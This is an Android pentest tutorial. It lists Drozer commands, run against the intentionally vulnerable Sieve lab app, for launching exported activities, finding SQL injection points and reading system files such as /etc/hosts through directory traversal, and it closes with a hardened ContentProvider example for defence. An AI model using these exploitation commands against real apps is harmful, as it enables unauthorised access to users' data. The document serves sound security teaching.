What is Drozer?
Drozer is a free and powerful Android pentest tool used for dynamic analysis during Android application security assessments.
[Windows 10] My lab setup
I perform my Android pentests on my Windows 10 host machine; the setup is as follows:
1. Python v2.7
2. Drozer v2.4.4
3. Other dependencies:
   pip install protobuf
   pip install PyOpenssl
   pip install twisted
   pip install service_identity
4. Drozer agent v2.3.4 apk
   - install drozer-agent.apk into the Android emulator
5. Nox player (Android emulator)
6. Sieve apk (vulnerable application)
[CMD] Start a drozer session
1. Open the drozer-agent application inside the Android emulator and toggle it on.
2. Open CMD on the Windows host machine and type the following to establish communication between drozer and drozer-agent:
adb forward tcp:31415 tcp:31415
3. In CMD on the Windows host machine, type the following to start drozer:
drozer console connect
[Drozer] Find the package name of the vulnerable application
run app.package.list -f <string>
[Drozer] Show package information
run app.package.info -a <package_name>
[Drozer] Identify attack surface
run app.package.attacksurface <package_name>
[Drozer] Exploit exported activities
List exported activities
run app.activity.info -a <package_name>
Invoke exported activities
run app.activity.start -a <package_name> <exported_activity_name>
[Drozer] Exploit exported content providers
Find accessible content URIs
run scanner.provider.finduris -a <package_name>
SQLi vulnerability
List accessible content URIs and the SQL injection points found in them.
run scanner.provider.injection -a <package_name>
Display the SQL tables behind the package's content providers if they are vulnerable to SQLi.
run scanner.provider.sqltables -a <package_name>
[CRUD] Query the content.
[CRUD] Insert the content.
[CRUD] Update the content.
[CRUD] Delete the content.
Directory traversal vulnerability
List accessible content URIs that are vulnerable to directory traversal.
run scanner.provider.traversal -a <package_name>
Exploit the directory traversal vulnerability to read files outside the provider's directory.
run app.provider.read <content_uri>../../etc/hosts
run app.provider.read <content_uri>../../proc/cpuinfo
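Both scanner findings above (injectable selection strings and unchecked paths handed to openFile) come from provider code that splices caller input into a SQL statement or a file path. The following is an added example, not code from this page or from the Sieve app, of a ContentProvider written so that scanner.provider.injection and scanner.provider.traversal have nothing to find. The authority, database, table, column and directory names are assumptions chosen for illustration.

```java
import android.content.ContentProvider;
import android.content.ContentUris;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

// Hardened provider (assumed names throughout; not the Sieve app's code).
public class HardenedProvider extends ContentProvider {
    static final String AUTHORITY = "com.example.hardenedprovider"; // assumed
    static final String TABLE_KEYS = "Key";                           // assumed
    static final String BACKUP_DIR = "backups";                       // assumed

    private SQLiteOpenHelper dbHelper;

    @Override
    public boolean onCreate() {
        dbHelper = new SQLiteOpenHelper(getContext(), "hardened.db", null, 1) {
            @Override public void onCreate(SQLiteDatabase db) {
                db.execSQL("CREATE TABLE " + TABLE_KEYS
                        + " (_id INTEGER PRIMARY KEY, service TEXT, password TEXT)");
            }
            @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) { }
        };
        return true;
    }

    // scanner.provider.injection fires when a provider builds SQL by string
    // concatenation ("... WHERE " + selection). Here the caller's selection and
    // selectionArgs are handed to SQLiteQueryBuilder, which binds the arguments,
    // and a projection map restricts which columns a caller may read at all.
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE_KEYS);
        qb.setStrict(true); // reject malformed or nested SQL in the selection
        Map<String, String> allowed = new HashMap<>();
        allowed.put("_id", "_id");
        allowed.put("service", "service"); // "password" is deliberately absent
        qb.setProjectionMap(allowed);
        return qb.query(dbHelper.getReadableDatabase(), projection, selection,
                selectionArgs, null, null, sortOrder);
    }

    @Override
    public Uri insert(Uri uri, ContentValues values) {
        // ContentValues are bound as parameters by the framework; nothing is spliced.
        long id = dbHelper.getWritableDatabase().insert(TABLE_KEYS, null, values);
        return ContentUris.withAppendedId(uri, id);
    }

    // update/delete ignore the caller's selection entirely and act only on the
    // row whose id is the last URI segment, so no caller-controlled WHERE exists.
    @Override
    public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
        String[] idArg = { String.valueOf(ContentUris.parseId(uri)) };
        return dbHelper.getWritableDatabase().update(TABLE_KEYS, values, "_id = ?", idArg);
    }

    @Override
    public int delete(Uri uri, String selection, String[] selectionArgs) {
        String[] idArg = { String.valueOf(ContentUris.parseId(uri)) };
        return dbHelper.getWritableDatabase().delete(TABLE_KEYS, "_id = ?", idArg);
    }

    @Override
    public String getType(Uri uri) {
        return "vnd.android.cursor.dir/vnd." + AUTHORITY + "." + TABLE_KEYS;
    }

    // scanner.provider.traversal fires when the URI path is appended to a base
    // directory unchecked, so "../../etc/hosts" escapes it. Canonicalizing both
    // paths resolves every ".." and symlink; anything that does not stay under
    // the base directory is refused before a descriptor is opened.
    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) {
            throw new FileNotFoundException("read-only provider");
        }
        File base = new File(getContext().getFilesDir(), BACKUP_DIR);
        String relative = uri.getPath() == null ? "" : uri.getPath();
        File requested = new File(base, relative);
        String baseCanon, reqCanon;
        try {
            baseCanon = base.getCanonicalPath() + File.separator;
            reqCanon = requested.getCanonicalPath();
        } catch (IOException e) {
            throw new FileNotFoundException("cannot resolve path");
        }
        if (!reqCanon.startsWith(baseCanon)) {
            throw new FileNotFoundException("path outside " + BACKUP_DIR);
        }
        return ParcelFileDescriptor.open(requested, ParcelFileDescriptor.MODE_READ_ONLY);
    }
}
```

Pair the class with android:exported="false" (or an android:permission attribute) on its <provider> element in AndroidManifest.xml, so the provider does not appear in app.package.attacksurface output in the first place; the code-level checks then defend against other components in the same app and against a later manifest change that re-exports it.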